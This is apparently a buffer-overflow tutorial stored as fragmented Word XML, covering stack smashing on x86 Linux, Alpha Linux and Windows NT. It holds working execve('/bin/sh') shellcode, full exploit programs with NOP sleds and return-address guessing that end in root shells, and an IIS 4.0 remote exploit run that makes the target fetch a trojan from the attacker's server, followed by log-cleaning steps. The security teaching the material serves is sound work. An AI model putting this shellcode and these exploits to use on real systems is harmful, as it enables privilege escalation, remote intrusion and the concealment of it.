                            </w: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(large_str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돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial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7pt;height:229.9pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-1pt;mso-position-vertical-relative:text;margin-left:107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 xml:space="preserve">void </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>function</w:t>
                      </w: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(char *st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char buffer[10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돋움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</w:rPr>
                        <w:t xml:space="preserve">      </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:color w:val="FF0000"/>
                        </w:rPr>
                        <w:t>strcpy(buffer,str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 xml:space="preserve">void </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>main</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">(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char large_str[255]; int I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for (I=0;I&lt;255;I++) large_str[I] = ‘A’ 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돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:i/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>function</w:t>
                      </w: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(large_str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돋움" w:cs="Arial"/>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:eastAsia="돋움" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial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275455" cy="2063750"/>
                <wp:effectExtent l="0" t="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2063880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4275360" cy="2063880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="76320" y="313200"/>
                            <a:ext cx="40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lowe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7560"/>
                            <a:ext cx="913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highe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921960"/>
                            <a:ext cx="40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03200"/>
                            <a:ext cx="40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21960"/>
                            <a:ext cx="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21960"/>
                            <a:ext cx="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21960"/>
                            <a:ext cx="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21960"/>
                            <a:ext cx="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921960"/>
                            <a:ext cx="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609120"/>
                            <a:ext cx="761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609120"/>
                            <a:ext cx="53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sf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09120"/>
                            <a:ext cx="53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FF0000"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>ret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609120"/>
                            <a:ext cx="456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*st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7560"/>
                            <a:ext cx="3580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AAAAAAAAAAA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FF0000"/>
                                  <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                                </w:rPr>
                                <w:t>AA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AAAAAAAAAA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1040" y="1384920"/>
                            <a:ext cx="3192840" cy="678960"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="textAreaLeft" fmla="*/ 66960 w 1810080"/>
                              <a:gd name="textAreaRight" fmla="*/ 1743120 w 1810080"/>
                              <a:gd name="textAreaTop" fmla="*/ 14040 h 384840"/>
                              <a:gd name="textAreaBottom" fmla="*/ 30744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590" y="0"/>
                                </a:moveTo>
                                <a:arcTo wR="3590" hR="3590" stAng="16200000" swAng="-5400000"/>
                                <a:lnTo>
                                  <a:pt x="0" y="14460"/>
                                </a:lnTo>
                                <a:arcTo wR="3590" hR="3590" stAng="10800000" swAng="-5400000"/>
                                <a:lnTo>
                                  <a:pt x="2699" y="21600"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5420" y="18050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18010" y="18050"/>
                                </a:lnTo>
                                <a:arcTo wR="3590" hR="3590" stAng="5400000" swAng="-5400000"/>
                                <a:lnTo>
                                  <a:pt x="21600" y="3590"/>
                                </a:lnTo>
                                <a:arcTo wR="3590" hR="359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Hackers can overwrite RET.</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr lIns="92160" rIns="92160" tIns="46440" bIns="46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699120"/>
                            <a:ext cx="1010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36.65pt;height:162.45pt" coordorigin="720,180" coordsize="6733,3249">
                <v:line id="shape_0" from="840,674" to="7197,674" stroked="t" o:allowincell="f" style="position:absolute">
                  <v:stroke color="black" weight="12600" dashstyle="shortdot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80;width:11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l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92;width:14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hig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1632" to="7197,1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2233" to="7197,2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20,1632" to="1920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0,1632" to="3720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0,1632" to="4320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0,1632" to="4920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9,1632" to="5519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79;top:1140;width:11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140;width:8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sf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140;width:8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FF0000"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>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140;width:7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*s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751;width:563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AAAAAAAAAAAA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FF0000"/>
                            <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
                          </w:rPr>
                          <w:t>AAA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AAAAAAAA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ccff" stroked="t" o:allowincell="f" style="position:absolute;left:1210;top:2361;width:5027;height:1068;mso-wrap-style:none;v-text-anchor:middle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Hackers can overwrite RET.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                  <v:fill o:detectmouseclick="t" type="solid" color2="#33330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61;top:1281;width:1591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Memo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Vulnerable program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Doesn’t check buffer boundary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ecutes with root permission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ploit the program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Put instructions into memory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Ex) execute /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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hange return address to the instruction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Find address of the shellcod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Brute force search near the stack pointer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Return address is near the stack pointer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nsert NOPs in the head of the buffer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When the hackers hit NOPs, execute the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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lassical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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40635" cy="342900"/>
                <wp:effectExtent l="5080" t="508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343080"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="25405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05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NOPs           Shellcode          Return addr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0.05pt;height:26.95pt" coordorigin="360,0" coordsize="4001,539">
                <v:shape id="shape_0" stroked="t" o:allowincell="f" style="position:absolute;left:360;top:0;width:400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NOPs           Shellcode          Return addres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7,1" to="907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1" to="292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Fonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Examine shellc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굴림" w:hAnsi="굴림" w:eastAsia="굴림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1} $ cat shell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#include &lt;stdio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void main(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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>char *name[2]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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>name[0]="/bin/sh"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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>name[1]=NULL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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>execve(name[0],name,NULL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2} $ gcc -o shell -g -static shell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3} $ gdb shel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(gdb) disassemble ma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. .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. .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(gdb) disassemble exec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. .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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. 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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">4-5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Stack overflow intel x86 linux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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>To execute “/bin/sh”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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/bin/sh\0” in the memory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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>The address of “/bin/sh\0” in the memory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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%eax=0xb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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%ebx=The address of “/bin/sh\0”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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%ecx=The address of the address of “/bin/sh\0”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18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%edx=null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Execute 0x80 interrupt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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Make shellco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jmp      0x1f</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"\xeb\x1f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popl     %esi</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"\x5e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ovl     %esi,0x8(%esi)</w:t>
        <w:tab/>
        <w:t>"\x89\x76\x08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xorl     %eax,%eax</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\x31\xc0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ovb     %eax,0x7(%esi)</w:t>
        <w:tab/>
        <w:t>"\x88\x46\x07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ovl     %eax,0xc(%esi)</w:t>
        <w:tab/>
        <w:t>"\x89\x46\x0c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ovb     $0xb,%al</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\xb0\x0b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ovl     %esi,%ebx</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\x89\xf3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leal     0x8(%esi),%ecx</w:t>
        <w:tab/>
        <w:t>"\x8d\x4e\x08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leal     0xc(%esi),%edx</w:t>
        <w:tab/>
        <w:t>"\x8d\x56\x0c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nt      $0x80</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\xcd\x80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xorl     %ebx,%ebx</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\x31\xdb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ovl     %ebx,%eax</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\x89\xd8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nc      %eax</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>"\x40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nt      $0x80</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\xcd\x80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call     -0x24</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"\xe8\xdc\xff\xff\xff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  <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.string  "/bin/sh“</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>"/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="굴림" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="3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94960" cy="338074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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Test the shellco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1} $ cat testsc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char shellcode[]=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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b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89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd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80\xe8\xdc\xff\xff\xff/bin/sh"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typedef void (*F)(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ain(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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>F fp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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fp=(F)(&amp;shellcode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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fp(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2} $ ./tests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  <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>bash$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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exploit vulnerable progra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io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ring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nt main(int argc,char **argv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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>char buff[1024]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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>strcpy(buff,argv[1]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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>return 0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2} $ ls –l vu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---s--x--x   1 root     root        11709 Jan  6 15:55 vul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3} $ ./vul AAAAA . . . AAAA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Segmentation faul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4} $ cat exp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io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lib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define ALIGN                             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define OFFSET                            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define RET_POSITION                   102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define RANGE                            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define NOP                            0x9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char shellcode[]=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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b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89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd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80\xe8\xdc\xff\xff\xff/bin/sh"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unsigned long get_sp(void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__asm__("movl %esp,%eax"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ain(int argc,char **argv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char buff[RET_POSITION+RANGE+ALIGN+1],*ptr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long addr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unsigned long sp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int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1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int i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if(argc&gt;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offset=atoi(argv[1]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p=get_sp(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addr=sp-offse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for(i=0;i&lt;bsize;i+=4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buff[i+ALIGN]=(addr&amp;0x000000ff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buff[i+ALIGN+1]=(addr&amp;0x0000ff00)&gt;&gt;8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buff[i+ALIGN+2]=(addr&amp;0x00ff0000)&gt;&gt;16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buff[i+ALIGN+3]=(addr&amp;0xff000000)&gt;&gt;24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for(i=0;i&lt;bsize-RANGE*2-strlen(shellcode)-1;i++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buff[i]=NOP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ptr=buff+bsize-RANGE*2-strlen(shellcode)-1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for(i=0;i&lt;strlen(shellcode);i++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*(ptr++)=shellcode[i]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buff[bsize-1]='\0'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printf("Jump to 0x%08x\n",addr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execl("./vul","vul",buff,0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5} $ ./exp 5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Jump to 0xbfffeee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bash# whoam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roo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bash#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false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 xml:space="preserve">4-6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Stack overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>alpha linu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lpha CPU uses 64bit addres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 address has many ‘\0’ character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an’t add two or more return addresses in the tail of the exploit code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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callsys instruction contains ‘\0’ characters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Shellcode have to modify itself to use callsys instruction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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Return address is pushed after local variable is pushed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Hackers have to overwrite second return address</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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All instructions must be aliagned</w:t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>Hackers have to pad 0~3 characters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>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exploit vulnerable progra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1} $ cat vul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io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ring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void vulfunc(char *buf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char localbuf[1024]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trcpy(localbuf+1,buf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main(int argc,char **argv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if(argc&gt;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vulfunc(argv[1]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2} $ cat exp.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dio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include&lt;string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define OFFSET                            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define ALIGN                             3     /* 0, 1, 2, 3          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define RET_POSITION                   1028     /* 0, 4, 8, 12, . . .  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#define NOP              "\x1f\x04\xff\x47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char shellcode[]=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30\x15\xd9\x43" /* subq $30,200,$16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11\x74\xf0\x47" /* bis $31,0x83,$17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12\x14\x02\x42" /* addq $16,16,$18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fc\xff\x32\xb2" /* stl $17,-4($18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12\x94\x09\x42" /* addq $16,76,$18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fc\xff\x32\xb2" /* stl $17,-4($18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ff\x47\x3f\x26" /* ldah $17,0x47ff($31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1f\x04\x31\x22“ /* lda $17,0x041f($17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fc\xff\x30\xb2“ /* stl $17,-4($16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f7\xff\x1f\xd2“ /* bsr $16,-32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10\x04\xff\x47“ /* clr $16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11\x14\xe3\x43“ /* addq $31,24,$17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20\x35\x20\x42“ /* subq $17,1,$0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ff\xff\xff\xff“ /* callsys ( disguised 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30\x15\xd9\x43“ /* subq $30,200,$16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31\x15\xd8\x43“ /* subq $30,192,$17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12\x04\xff\x47“ /* clr $18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40\xff\x1e\xb6“ /* stq $16,-192($30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48\xff\xfe\xb7" /* stq $31,-184($30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98\xff\x7f\x26" /* ldah $19,0xff98($31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d0\x8c\x73\x22“ /* lda $19,0x8cd0($19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13\x05\xf3\x47" /* ornot $31,$19,$19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3c\xff\x7e\xb2" /* stl $19,-196($30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69\x6e\x7f\x26" /* ldah $19,0x6e69($31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2f\x62\x73\x22" /* lda $19,0x622f($19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38\xff\x7e\xb2" /* stl $19,-200($30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13\x94\xe7\x43" /* addq $31,60,$19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20\x35\x60\x42" /* subq $19,1,$0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"\xff\xff\xff\xff";/* callsys ( disguised ) */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unsigned long get_sp(void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__asm__("bis $31,$30,$0"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nt main(int argc,char **argv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char buff[RET_POSITION+8+ALIGN+1],*ptr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char *nop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int offset=OFFSET,bsize=RET_POSITION+8+ALIGN+1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unsigned long sp,addr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int i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if(argc&gt;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offset=atoi(argv[1]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nop=NOP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for(i=0;i&lt;bsize;i++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buff[i]='a'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for(i=0;i&lt;bsize;i++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buff[i+ALIGN]=nop[i%4]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sp=get_sp(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addr=sp-offse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ptr=buff+bsize-strlen(shellcode)-8-1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for(i=0;i&lt;strlen(shellcode);i++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ab/>
        <w:t>*(ptr++)=shellcode[i]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buff[RET_POSITION+ALIGN]=(addr&amp;0x00000000000000ff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buff[RET_POSITION+ALIGN+1]=(addr&amp;0x000000000000ff00)&gt;&gt;8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buff[RET_POSITION+ALIGN+2]=(addr&amp;0x0000000000ff0000)&gt;&gt;16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buff[RET_POSITION+ALIGN+3]=(addr&amp;0x00000000ff000000)&gt;&gt;24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buff[RET_POSITION+ALIGN+5]=(addr&amp;0x0000ff0000000000)&gt;&gt;40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buff[RET_POSITION+ALIGN+6]=(addr&amp;0x00ff000000000000)&gt;&gt;48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buff[RET_POSITION+ALIGN+7]=(addr&amp;0xff00000000000000)&gt;&gt;56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buff[bsize-1]='\0'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printf("Jump to 0x%016x\n",addr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ab/>
        <w:t>execl("./vul","vul",buff,NULL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3} $ ./ex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Jump to 0x000000001ffff6c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Illegal instruc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[ ohhara@ohhara ~ ] {4} $ ./exp 4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Jump to 0x000000001ffff5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bash# whoam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roo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bash#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">4-7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Stack overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>WindowsNT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBodyIndent"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>X:\Code&gt;iishack example.com 80 ourserver.com/ncx.exe</w:t>
        <w:br/>
        <w:t>------(IIS 4.0 remote buffer overflow exploit)-----------------</w:t>
        <w:br/>
        <w:t>(c) dark spyrit -- barns@eeye.com.</w:t>
        <w:br/>
        <w:t>http://www.eEye.com</w:t>
        <w:br/>
        <w:br/>
        <w:t>[usage: iishack ]</w:t>
        <w:br/>
        <w:t>eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe</w:t>
        <w:br/>
        <w:t>do not include 'http://' before hosts!</w:t>
        <w:br/>
        <w:t>---------------------------------------------------------------</w:t>
        <w:br/>
        <w:br/>
        <w:t>Data sent!</w:t>
        <w:br/>
        <w:br/>
        <w:t>Note: Give it enough time to download your troja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00" w:hanging="0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  <w:t>X:\Code&gt;telnet example.com 80</w:t>
        <w:br/>
        <w:br/>
        <w:t>Microsoft(R) Windows NT(TM)</w:t>
        <w:br/>
        <w:t>(C) Copyright 1985-1996 Microsoft Corp.</w:t>
        <w:br/>
        <w:br/>
        <w:t>C:\&gt;[You have full access to the system, happy browsing :)]</w:t>
        <w:br/>
        <w:t>C:\&gt;[Add a scheduled task to restart inetinfo in X minutes]</w:t>
        <w:br/>
        <w:t>C:\&gt;[Add a scheduled task to delete ncx.exe in X-1 minutes]</w:t>
        <w:br/>
        <w:t>C:\&gt;[Clean up any trace or logs we might have left behind.]</w:t>
        <w:br/>
        <w:t>C:\&gt;exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="굴림" w:cs="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림"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4-8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Advanced stack overflow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3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oo small buffer siz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Put the shellcode in the environment variable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Remote stack overflow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Put spawning shell daemon code into the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Filtering the buffer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Make self modifying shellcode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 xml:space="preserve">4-9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How to prevent buffer overflow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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
